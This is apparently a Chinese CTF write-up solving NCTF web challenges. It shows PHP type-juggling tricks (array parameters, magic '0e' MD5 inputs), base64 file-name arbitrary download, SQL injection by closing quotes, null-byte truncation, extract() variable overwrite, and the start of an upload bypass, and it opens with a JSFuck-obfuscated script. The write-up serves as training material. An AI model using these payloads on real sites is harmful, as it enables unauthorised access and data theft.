])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+[])[!![]+!![]+!![]])+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[+[]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+[]))+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))()
  • 控制台执行,页面显示一个php文件,文件名是md5加密,解密为md5.php。
1bc29b36f623ba82aaf6724fd3b16718.php

zip -r flagbak.zip ./*
  • 打开flagbak.zip
    直接可下载,是一个flag.txt文件
flag is:nctf{bash_history_means_what}
  • flag is:nctf{bash_history_means_what}

pass check

核心源码

<?php
$pass=@$_POST['pass'];
$pass1=***********;//被隐藏起来的密码
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>

传送门:题目地址

  • 页面只有一行
    please input pass!
  • 分析:
    1.看源码意思是post的pass要和pass1相等
    2.@在php中是可以屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息,这样用户就看不到程序的出错信息。
    3.strcmp()函数

    4.两个string相等,则为0,所以在strcmp()前面加了感叹号!。
    5.利用PHP弱类型漏洞
  • post 一个数组,令strmp()返回null,则"!null"为真,执行echo "flag:nctf{*}"
    1.开始是这样构建的pass=[],没用。

2.应该这样构建pass[]=123


  • flag:nctf{strcmp_is_n0t_3afe}

Header

头啊!!头啊!!!
传送门: 点我咯

  • 直接看header


  • nctf{tips_often_hide_here}

文件包含

没错 这就是传说中的LFI
传送门点我带你飞
TIPS:http://drops.wooyun.org/tips/3827

  • 不看了,这题和Bugku的(flag在index里)是一样的,参见[Bugku writeup]Web
  • nctf{edulcni_elif_lacol_si_siht}

单身一百年也没用

是的。。这一题你单身一百年也没用
传送门:biu~

  • 老套路,查看网络状态,点进去看看什么变化


  • 之前index.php的304状态变成了302,flag就在响应头里
  • nctf{this_is_302_redirect}

Download~!

想下啥就下啥别下音乐,不骗你,试试下载其他东西
真·奥义·传送:点我

  • 查看源码
<pre id="line1">  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<title>Game 19</title>  
<link href="[templatemo_style.css](view-source:http://way.nuptzj.cn/web6/templatemo_style.css)" rel="stylesheet" type="text/css" />  
</head>  <body>  
<div id="templatemo_container">  <div id="templatemo_header">  <div id="website_title">  </div>  </div>  <div id="templatemo_menu">  
<ul>  <li><a href="[#](view-source:http://way.nuptzj.cn/web6/#)" class="current">Tips</a></li>  <li><b>down</b></li>  
</ul>  </div>  
<div id="templatemo_content_wrapper">  <div id="templatemo_content">  <div class="content_title_01">听会歌吧</div>  <div class="horizontal_divider_01">&nbsp;</div>  <
div class="cleaner">&nbsp;
</div>  
<p>为了让大家更轻松的比赛,为大家准备了两首歌让大家下载</p>  
<p><a href="[download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=](view-source:http://way.nuptzj.cn/web6/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=)" target="_blank">星星点灯</a>
</p>  <p>
<a href="[download.php?url=YnV4aWFuZ3poYW5nZGEubXAz](view-source:http://way.nuptzj.cn/web6/download.php?url=YnV4aWFuZ3poYW5nZGEubXAz)" target="_blank">不想长大</a>
</p>  
<div class="cleaner">&nbsp;
</div>  
</div>  
<div class="cleaner">&nbsp;</div>  
</div>  <div id="templatemo_footer">  
</div>  </div>  </body>  </html></pre>
  • 点击"download.php?url=YnV4aWFuZ3poYW5nZGEubXAz",文件名base64加密,试试下载其他文件,一般都是想要当前页面的源码,于是将download.php加密,构造:
    view-source:http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw,这样可以不用下载就可以看到源码
??<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
    $file_size = filesize($url);
    header ( "Pragma: public" );
    header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
    header ( "Cache-Control: private", false );
    header ( "Content-Transfer-Encoding: binary" );
    header ( "Content-Type:audio/mpeg MP3");
    header ( "Content-Length: " . $file_size);
    header ( "Content-Disposition: attachment; filename=".$url);
    echo(file_get_contents($url));
    exit;
}
else {
    echo "Access Forbidden!";
}
?>

?<?php
//flag:nctf{download_any_file_666}
?>
  • nctf{download_any_file_666}

COOKIE

COOKIE就是甜饼的意思~
地址:传送门

TIP:
0==not


  • 利用tamper data修改cookie的login=1就可以了


  • 显示:
    flag:nctf{cookie_is_different_from_session}

  • nctf{cookie_is_different_from_session}

MYSQL

不能每一题都这么简单嘛
你说是不是?
题目地址

鍒お寮€蹇冿紝flag涓嶅湪杩欙紝杩欎釜鏂囦欢鐨勭敤閫斾綘鐪嬪畬浜嗭紵
鍦–TF姣旇禌涓紝杩欎釜鏂囦欢寰€寰€瀛樻斁鐫€鎻愮ず淇℃伅

TIP:sql.php

<?php
if($_GET[id]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $id = intval($_GET[id]);
  $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
  if ($_GET[id]==1024) {
      echo "<p>no! try again</p>";
  }
  else{
    echo($query[content]);
  }
}
?>
  • 对sql.php传入id参数,开始还没相通id=1024的意义,还试着爆破id,后来想想,其实id=1024才是flag的内容。
    1.要让$id=1024
    2.传入的参数$_GET[id]又不能等于1024
    3.利用intval()取整函数构造
  • 令$_GET[id]=1024.1即可:
    http://chinalover.sinaapp.com/web11/sql.php?id=1024.1 
the flag is:nctf{query_in_mysql}
  • nctf{query_in_mysql}

md5 collision

源码

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}
?>

传送门:题目地址

  • 打开,显示一行字
please input a
  • 要传入一个参数
    1.a!=QNKCDZO
    2.md5(a)==md5('QNKCDZO')
  • 好像没头绪,看看md5('QNKCDZO')是什么样子:
    0e830400451993494058024219903391
  • 0e开头,利用“==”的特性:对比的时候会进行数据转换,0eXXXXXXXXXX 转成0了。
  • 结合0e开头MD5值:
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

nctf{md5_collision_is_easy}
  • 要看清是get还是post,开始我就一直在post,结果怎么也出不来结果。
  • nctf{md5_collision_is_easy}

bypass again

地址:依旧是弱类型

来源 hctf

if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}

  • 要求:
    1.传入两个参数a和b
    2.a!=b
    3.md5(a)==md5(b)

  • 利用内置函数的参数的松散性:调用函数时给函数传递函数无法接受的参数类型。


  • 传入两个数组,使得md5()返回null,null==null:
    http://chinalover.sinaapp.com/web17/index.php?a[]=1&b[]=2

if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}
Flag: nctf{php_is_so_cool}
  • 这次又搞清是get还是post,又一顿post,真是服了我自己
  • nctf{php_is_so_cool}

PHP是世界上最好的语言

听说PHP是世界上最好的语言
地址:题目地址

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?
  • 开始还在倒腾 eregi()函数: 字符串比对解析,与大小写无关。
  • 后面发现源代码里对id又一次urldecode,所以我们要对id两次urlencode
    1.因为url编码一般是不会对字母转换的
    2.先将hackerDJ转成16进制,再每两个数字前加百分号:%63%6b%65%72%44%4a
    3.再urlencode: %2563%256b%2565%2572%2544%254a
    http://way.nuptzj.cn/php/index.php/?id=%2563%256b%2565%2572%2544%254a 
Access granted!

flag: nctf{php_is_best_language}


Can you authenticate to this website? index.txt
  • 后记:
    url解码过程:
    %-->%
    %25-->%
    其实第二次urlencode是对%-->%25,那么可以再对一个字符二次编码即可:%2563%6b%65%72%44%4a,反正其他%依然解码为%
  • nctf{php_is_best_language}

SQL注入1

听说你也会注入?
地址: 题目地址

  • 点source
<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST[user]);
  $pass = md5(trim($_POST[pass]));
  $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
    echo '</br>'.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
      echo "<p>Logged in! flag:******************** </p>";
  }
  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
  • php的点是连接符
SQLstr = "select    *    from abc_table where user_name = ' " . $user_name . " ' ";   
可以改写成
SQLstr = "select    *    from abc_table where user_name = ' $user_name ' ";

  • 没有过滤,SQL注入只需要闭合‘)即可,且user=admin


  • nctf{ni_ye_hui_sql?}

/x00

题目地址:题目有多种解法,你能想出来几种?

  • 页面给了源码
 view-source:

    if (isset ($_GET['nctf'])) {
        if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
            echo '必须输入数字才行';
        else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   
            die('Flag: '.$flag);
        else
            echo '骚年,继续努力吧啊~';
    }
  • 要求:
    1.传入nctf参数
    2.nctf参数以数字开头,中间多个数字,数字结尾:^[1-9]+$-->全为数字
    3.nctf==#biubiubiu,才打印出flag
  • 利用0x00截断ereg()
  • 注意要urlencode:
    0x00-->%00
    #-->%23
    令nctf=123%00%23biubiubiu
  • 刷新出现flag
    Flag: flag:nctf{use_00_to_jieduan}
  • nctf{use_00_to_jieduan}
  • 后记:
    令nctf[]=123,得到:
    Warning: strpos() expects parameter 1 to be string, array given in web4/f5a14f5e6e3453b78cd73899bad98d53/index.php on line 10
    Flag: flag:nctf{use_00_to_jieduan}
  • 解析:
    -->ereg()是处理字符串的,当处理数组的时候,返回NULL
    -->NULL===FALSE(严格比较返回FALSE)
    -->strpos()是处理字符串的,当处理数组的时候,返回NULL
    -->NULL===FALSE(严格比较)不成立,NULL!==FALSE,打印flag

  • 参考:



变量覆盖

听说过变量覆盖么?
地址: 题目地址

  • 查看source.php
 <?php
include("secret.php");
?>
<html>
    <head>
        <title>The Ducks</title>
        <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
    </head>
    <body>
        <div class="container">
            <div class="jumbotron">
                <center>
                    <h1>The Ducks</h1>
                    <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?></code>
                            </div>
                        <?php } ?>
                    <?php } ?>
                    <form action="." method="POST">
                        <div class="row">
                            <div class="col-md-6 col-md-offset-3">
                                <div class="row">
                                    <div class="col-md-9">
                                        <input type="password" class="form-control" name="pass" placeholder="Password" />
                                    </div>
                                    <div class="col-md-3">
                                        <input type="submit" class="btn btn-primary" value="Submit" />
                                    </div>
                                </div>
                            </div>
                        </div>
                    </form>
                </center>
            </div>
            <p>
                <center>
                    source at <a href="source.php" target="_blank">/source.php</a>
                </center>
            </p>
        </div>
    </body>
</html>
  • 关键信息:
 <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?>
  • extract() 函数从数组中将变量导入到当前的符号表。
    1.该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
    2.由于extrac()的参数是POST,则post一个参数thepassword_123覆盖掉默认的thepassword_123,并且令post的pass=thepassword_123。
  • nctf{bian_liang_fu_gai!}

上传绕过

题目地址:猜猜代码怎么写的

  • 上传文件绕过类型,打开Burpsuite,上传一个文件试试:


1. filename=1.png
2. uppath=/uploads/1.png

  • 上传一个php吧


1. filename=download.php
2. uppath=/uploads/download.php
  • 分析:
    1.上传的文件后缀即是php又是jpg,png,gif。
    2.代码对两处进行了匹配:
1. filename
2. 上传路径:/uploads/

  • 我们来看一下path是怎么构成的,修改一下path和filename看看:


